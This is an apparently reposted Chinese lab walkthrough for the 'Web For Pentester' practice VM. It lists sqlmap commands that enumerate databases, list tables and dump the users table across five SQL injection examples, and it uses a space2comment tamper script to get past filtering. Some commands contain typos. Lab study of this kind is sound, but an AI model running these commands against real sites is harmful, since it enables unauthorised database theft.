
sqlmap注入-Web For Pentester
一、要求
使用sqlmap注入,测试pentester的web页面漏洞
二、环境Pentester网站,服务器ip地址为192.168.202.128
三、步骤 1.example1注入
a.查询当前数据库:
[email protected]:~# sqlmap -u "http://192.168.202.128/sqli/example1.PHP?
name=root" –dbs
b.查询数据库对应的表
[email protected]:~# sqlmap -u "http://192.168.202.128/sqli/example1.PHP?
name=root" -D exercises –tables
c.查询表内容
2.example2注入
a.查看example2当前数据库
[email protected]:~#sqlmap-u http://192.168.202.128/sqli/example2.php?
name=root –dbs出现报错,执行绕过脚本语句
[email protected]:~#:sqlmap -u 192.168.202.128/sqli/example2.PHP?
name=root--dbs --tamper=space2comment.py -v
b.查看表信息
[email protected]:~#sqlmap-u http://192.168.202.128/sqli/example2.php?
name=root -D exercises --tables
c.查看表下内容
[email protected]:~#sqlmap-u http://192.168.202.128/sqli/example2.php?
name=root -D exercise -T users --dump
3.example3注入
a.查看example3当前数据库
[email protected]:~#sqlmap-u http://192.168.202.128/sqli/example3.php?
name=root –dbs出现报错,执行绕过脚本语句
[email protected]:~#:sqlmap -u 192.168.202.128/sqli/example3.PHP?
name=root--dbs --tamper=space2comment.py -v
b.查看表信息
[email protected]:~#sqlmap-u http://192.168.202.128/sqli/example3.php?
name=root -D exercises --tables
c.查看表下内容
[email protected]:~#sqlmap-u http://192.168.202.128/sqli/example3.php?
name=root -D exercise -T users --dump
4.example4注入
(由网址http://192.168.202.128/sqli/example4.php?id=2可以看出example4为数字型注入)
a.查看数据库
[email protected]:~# sqlmap -u "http://192.168.202.128/sqli/example4.PHP?ID=2" --dbs
b.查看表信息
[email protected]:~# sqlmap -u "http://192.168.202.128/sqli/example4.PHP?ID=2" -D exercises --tables
c.查看表下内容
[email protected]:~# sqlmap -u "http://192.168.202.128/sqli/example4.PHP?ID=2" -D exercises -T users --dump
5.example5注入
(由网址http://192.168.202.128/sqli/example5.php?id=2可以看出example5为数字型注入)
a.查看当前数据库
[email protected]:~# sqlmap -u "http://192.168.202.128/sqli/example5.PHP?ID=2" --dbs
b.查看表信息
[email protected]:~# sqlmap -u "http://192.168.202.128/sqli/example5.PHP?ID=2" –D exercise --tables
c.查看表下相关信息
[email protected]:~# sqlmap -u "http://192.168.202.128/sqli/example5.PHP?ID=2" –D exercise -T users --dump
总结
以上是内存溢出为你收集整理的sqlmap注入-Web For Pentester全部内容,希望文章能够帮你解决sqlmap注入-Web For Pentester所遇到的程序开发问题。
如果觉得内存溢出网站内容还不错,欢迎将内存溢出网站推荐给程序员好友。
欢迎分享,转载请注明来源:内存溢出
微信扫一扫
支付宝扫一扫
评论列表(0条)